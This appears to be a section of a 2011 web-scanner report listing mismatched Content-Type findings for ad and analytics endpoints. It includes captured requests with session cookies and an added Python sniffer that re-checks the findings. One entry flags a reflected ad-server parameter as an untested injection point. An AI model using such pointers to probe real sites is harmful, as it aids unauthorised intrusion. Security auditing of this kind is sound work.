Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e9320333bd69; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:52 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; Expires=Sun, 01-Jan-2012 00:29:52 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=03c4ccee; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200db2e76; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.72. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242e360cd228b0a9f5ce36cd7ae3924cbeb05ca695832411d3ee0910c8eb07b1625753857e051e7336ac162ee32647ce02fc6488ccba1315aed893e219377b56013ce1b4b343950da3287741e91a387152a222a96b5e64c1fe804723d08c84ab85bbddab3e05aafc5b008e1b951e241f5a571874422724f41a76d8f7c8b4c7a09beb3b83ea42bbd001b8cf2ee001e56ade9c779fcc2d628d24594e1b7d1c51005929b853a591ce58c8d3cc335f0cf4d34caf4e452a5362ed22584f4e926cd6a310ae8a08882d174da594d01da3807ad7054f3ff3323bb15b96a8960c457ffb6dcf804cbe87f9fca292890d6cd87536c914b721f181414af3343fe0e138920aa65419774524be075b2b5f1b2ab1843066aece8f71bddba05ab23869f2955d227d572dab9ed5efa167bc2bca8e25175f55d8517e1334f21288737072c7d27637d16f854c0dd280fa75c5005264714eabeb75412061049f5d29109a198147ec69f9b9f16cd432dbab74fa42fd1960054baf005cfc3345776ae2b78b506d2cf4ee9305215f3c36ab8d804343c9f17c24d6eec92d5a4068d44f3d6279640d681363e30e10dcb959a7fae6a40cb8c5c464066a6609612e1ca6d7cbebb13dacd2ed9055d5fa282c9392f2b0059e61cc683da74b2574cfa23bac627512bab396e0ec31846f4870c6b1fbb2aa9415784daeb8b66c15ffadddd07aeb250f9460b6b057407ef01cffd2193a454c3b83fa845fc98ded6bef457c93bc17ecaa9069b0e82f4e8a17e214d9cc28208446593ebc1ceef705486376b84c3971b165140960058f31a24ebdd78dda40e1df4d33cb0a0e25895c8df49c4854bbb5c1435a5a6373611b67fd5ed4455456dfe5e061dc59eef4191141e0d0cebbbbb4cb781b92e7e8616fb483130032b2512378536e0c258ba2bc76a069b759c8c4ea58f9b5ac759a529801d7ba7eda93afe0ddabb50284d0f2dd2330e40235b893f0fdbdc19c91fed6c3b901ef11a4e147b7d807d2f22b5c5ed60ec2985a5eec30af349443453a8158905daaa4ab3ef284cba238d2b33eddc4838376817bec49561a8484b5e5486b69e61b6d77380006cb4f07b4abc0e97049d0da6d59f2b8d1abaf88ef36907fd525691579327f18efee02836a77f4df2e3be17598d3b2e778029bba743ee8ccd845ea6294f06e2decf38abc4ebd95b95c510c7161faabbad762f454429e9f43927ce5a51f3771c7da9144261adc801782c234a62e741a2649cf5409d6a52
28dd012b0f5fb3ea5a14d8b11bfa76748fc9f8331643549233dc7357c4975f7e97c004bd9e5dcc60318d2b38ade449d6cd0bc0da163ca2e2c4297f6152d0aa548b27d987e3d839ab944c7f560e8e4b0e52bf46302a88e7cdea9f0e86a7b4c0a01e32ab8b90482efe55db125a2ff53fdd80c39a4807bd9d1e13e56e2da4058f0ffb9d7d0d21e8f86286b288f55fa6e898222c74dd91f19e8bb4e607fd2a4bc0e3c538383c327191ca03e7849185da7384812fda77ed78a439991ce205c96df42fd8c9cc937c5383f7250ca2061e1f47daf3fa197aa139df9f6e4efa9e59d75be2c49820728fa1f9c7ef5bb6cc9e0e218461a09d818da52d4bb27dcbf682b79452c84d2c97a61e3989ef5a27a040eceed8b1e79127130111b637e59e539ee9b1314215045bc86f7123a277006a15b4  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us/corporate-social-responsibility.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d042f457f; _wt.mode-79569=fcdcc722e93201f611e1; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:05 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; Path=/ots
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Set-Cookie: _wt.conversion-79569-ta_11ApplyNowStep2ABn=018ce995; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e932031ed775; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1873
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.73. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The response contains the following Content-type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f4be74b510672500b76fa863f0a70ac9a10a6ac9448d7d658ffd65204891b7da750f44937ff57efc17e35a012427ad27289256f348e29cf92f5565577269953dc97390865893f7a469f40de8df12e242f06ec4338f0c9609ed6286853138dbcf4b992a457f09522bedec119d956e043c6b5402b520bf74799c4cc7352300b03ec55280aee97c70eadf262fc27cbb7d1dc35c2e78397fd23e977853c5a3d30e2a3a2ed6b5bf1d1ebe14630a4b801ce334f0d6b7e654b582da1ce5b34bff1ee3a54c9f54797c5759ea6685618f272e01ec89ac279236b644448ae5e9470856b0eed63ab489a93ed746c3c0b9cccd150198cac82b4a05f4998f7dce37bbdf017ad4a4ee52a53e63863fca84f824e07d3d0be3ff88889026995f5e1087634ee46e4fedb02527ba58bd7f9d2ce466b0b7cbcf63ecba56f9f81b18b5d0859f49278b4c775444697be06e2b9b565cc04d93745fad54191ca808e5e5b2e7ef0a49077aaaaa8b448ea80ff467d08836009661c7768fadf41dd83148f0919ac17152cc65b25fba3f11362bd56a5f6d6930237f44a642d59f380be709504679151cbde6f81f414d5612b99bda4efab25f269df3baac129f6d64eaa245b933c89f2c31d2c578cbc2385011b00c499227f7f377b927155dce8337fa811f6c2d831fc7113df4c487a6028e45f7d275955a8488303624f90d82ded93fae2d188aa6373b0b6287708146a89a4553a79039e9a14baf71203aa0ec8b757b6c5a0d8a5a83c49b1cf7011aae39b6ca275b2ea43a6203cc1644f4870b6f1bbb3da0495f82d6f68b398a66d7eecc1eaff848e155512b5e2015ed12a39363d2f00cd9ba2bbb47eff6b092f2ac07d836d061d9b615f364ceb9bde36a355e9edd840e4c6b9eeaced8e6754b802c63938edb405b1310980e25fb3b0fc0ef19c5bc1d5aa1c06ffced00877b9c HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/about-us.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=2D0CE6DA7B82936A31CBC9ACE233AAA7; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
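
The finding repeated through this section is a heuristic comparison between the declared Content-Type and what the first bytes of the body look like, and the entries that follow show where that heuristic breaks: a /** ... */ header comment is read as CSS, packed eval(...) JavaScript and a one-line tracker callback are "unrecognised", and an ad-server script wrapped in <!-- --> is called HTML. The Python below is an added example written for this page; it is not the scanner's code and not code from any of the sites listed. It re-checks captured responses with a sniffer that treats a comment-only or empty body as inconclusive, recognises the comment-wrapped script idiom, and records whether X-Content-Type-Options: nosniff was present. The SAMPLES are constructed from the first lines of the bodies quoted in entries 28.73 to 28.86, cut short and in places shortened further, so they are illustrative rather than verbatim captures.

```python
"""Re-check 'content type incorrectly stated' findings from captured responses.
Added example for this page; not the scanner's code nor code from any site
listed here. SAMPLES are constructed from the first lines of the bodies quoted
in entries 28.73-28.86 (truncated, some shortened), not verbatim captures."""
import re

HTML_TYPES = {"text/html", "application/xhtml+xml"}
SCRIPT_TYPES = {"text/javascript", "application/javascript",
                "application/x-javascript", "application/ecmascript"}

# First token of a JavaScript body: a keyword, `this.`, or an identifier or
# member chain followed by a call, index or assignment. Heuristic only.
JS_START = re.compile(r"^(?:var|let|const|function)\b|^this\."
                      r"|^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*\s*[(\[=]")
# A CSS rule: a selector free of {}<=;() followed by `{ prop: value }`.
CSS_RULE = re.compile(r"^[^{}<=;()]+\{[^{}]*:[^{}]*\}", re.S)


def parse_response(raw):
    """Split a raw HTTP response into (lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    headers = {}
    for line in head.split("\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return headers, body


def declared_family(content_type):
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime in HTML_TYPES:
        return "html"
    if mime in SCRIPT_TYPES:
        return "script"
    return {"text/css": "css", "text/plain": "text"}.get(mime, mime or "missing")


def sniff_family(body):
    text = body.lstrip("\ufeff \t\r\n")
    if not text:
        return "empty"
    if text.startswith("<!--"):
        inner = text[4:].lstrip()
        if inner.startswith("-->") or JS_START.match(inner) is None:
            return "html"                      # an empty comment is still HTML
        return "script-in-html-comment"        # ad-tag idiom: JS inside <!-- -->
    if text.startswith("<"):
        return "html"
    # Block comments are legal in both CSS and JavaScript, so skip them; if the
    # body is cut off inside one, or nothing follows, say so rather than guess.
    while text.startswith("/*"):
        end = text.find("*/")
        if end < 0:
            return "comment-only"
        text = text[end + 2:].lstrip()
    if not text:
        return "comment-only"
    if CSS_RULE.match(text):
        return "css"
    if JS_START.match(text):
        return "script"
    return "text"


def check(raw):
    """Compare the declared Content-Type family with the sniffed one."""
    headers, body = parse_response(raw)
    declared = declared_family(headers.get("content-type", ""))
    sniffed = sniff_family(body)
    if sniffed in ("comment-only", "empty"):
        verdict = "inconclusive"
    elif sniffed == "script-in-html-comment":
        verdict = "match" if declared == "script" else "mismatch"
    else:
        verdict = "match" if sniffed == declared else "mismatch"
    nosniff = headers.get("x-content-type-options", "").lower() == "nosniff"
    return {"declared": declared, "sniffed": sniffed, "verdict": verdict,
            "nosniff": nosniff}


SAMPLES = {  # constructed: status line, Content-Type, blank line, body start
    "28.73 webtrends js-3.0": "HTTP/1.1 200 OK\nContent-Type: text/html;charset=UTF-8\n\n"
        "/**\n* Copyright 2005-2009 webtrends All Rights Reserved.\n* $Id: js.jsp,v 3.0",
    "28.76 pubmatic AdServerServlet": "HTTP/1.1 200 OK\nContent-Type: text/html\n\n"
        "document.write('<div id=\"http_dm_travelocity_comhtml_ngadsize\" style=\"position: absolute;\">');",
    "28.77 liveperson mTag.js": "HTTP/1.1 200 OK\nContent-Type: application/x-javascript\n\n"
        "eval((function(s){var a,c,e,i,j,o=\"\";return o;})('x'));",
    "28.79 thousandeyes /rest/json": "HTTP/1.1 200 OK\nContent-Type: text/html\n\nOK",
    "28.83 burstnet ad22156a.cgi": "HTTP/1.1 200 OK\nContent-Type: text/html\n\n"
        "<!--\nvar cb = Math.random();\nvar d = document;\n",
    "28.84 cheaptickets empty.html": "HTTP/1.1 200 OK\nContent-Type: text/html\n\n<!-- -->",
    "28.86 getaroom market_deals": "HTTP/1.1 200 OK\nContent-Type: text/javascript; charset=utf-8\n\n"
        "this.heading_update[this.deals_cache_index] = '<div id=\\\"deals_heading\\\"><h2>Hotel Deals</h2></div>';",
}


def audit(samples=SAMPLES):
    """Return {sample name: verdict} for a batch of captured responses."""
    return {name: check(raw)["verdict"] for name, raw in samples.items()}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        r = check(raw)
        print(f"{name:32} declared={r['declared']:7} sniffed={r['sniffed']:23} {r['verdict']}")
```

Running the file prints one verdict per sample: inconclusive for the webtrends js.jsp header (a comment alone cannot distinguish CSS from JavaScript), mismatch for the text/html responses whose bodies are script or a bare status string, and match where the scanner reported "unrecognised content" or "HTML" for what is ordinary JavaScript. None of the captured responses in this section sets X-Content-Type-Options, and for a script endpoint that header is only safe to add once the declared type is a JavaScript type.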

28.74. http://ots.optimize.webtrends.com/ots/ots/js-3....[SNIP]...

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3....[SNIP]...

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Same endpoint as 28.73 with a different long hex segment in the path. The body again begins with the js.jsp header comment, so the content is JavaScript rather than CSS; this request received the full 44561-byte script, where 28.73 received 1695 bytes.

Request

GET /ots/ots/js-3....[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:13 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6FBCA80F75E0528A929525FF0B85D1D0; Path=/ots
Set-Cookie: _wt.mode-79569=e1f36dbd085f0041d284; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; Expires=Sun, 01-Jan-2012 00:03:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.75. http://ots.optimize.webtrends.com/ots/ots/js-3....[SNIP]...

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3....[SNIP]...

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html;charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain CSS.

Third instance of the webtrends endpoint (see 28.73): the body is the js.jsp header comment, i.e. JavaScript served as text/html, not CSS.

Request

GET /ots/ots/js-3....[SNIP]... HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; _wt.mode-79569=fcdcc722e93202f2ddfb

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

28.76. http://showadsak.pubmatic.com/AdServer/AdServerServlet

Summary

Severity:   Information
Confidence:   Firm
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The response contains the following Content-Type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Here the classification is right: the body is a document.write(...) ad tag meant to be loaded with <script src>, so a JavaScript type is the accurate one. Note also that the leading part of the frameName request parameter (http_dm_travelocity_comhtml_ngadsize) is echoed as the id attribute of the written <div>; the truncated body does not show whether that echo is encoded, so it is an input point to test rather than a finding in itself.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...

28.77. http://sr2.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-Type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain unrecognised content.

The declared type is correct. The body is packed JavaScript, an eval(...) applied to a decoder function and an encoded payload, which a signature-based sniffer does not recognise; treat the content-type finding as a false positive. The Content-Location header points at sales.liveperson.net, and the packed form means the code this tag runs inside the orbitz.com page cannot be reviewed without unpacking it first.

Request

GET /hcp/html/mTag.js?site=15744040 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=15744040
Last-Modified: Sun, 18 Sep 2011 08:01:02 GMT
Accept-Ranges: bytes
ETag: "a24c01bd975cc1:2070"
Server: Microsoft-IIS/6.0
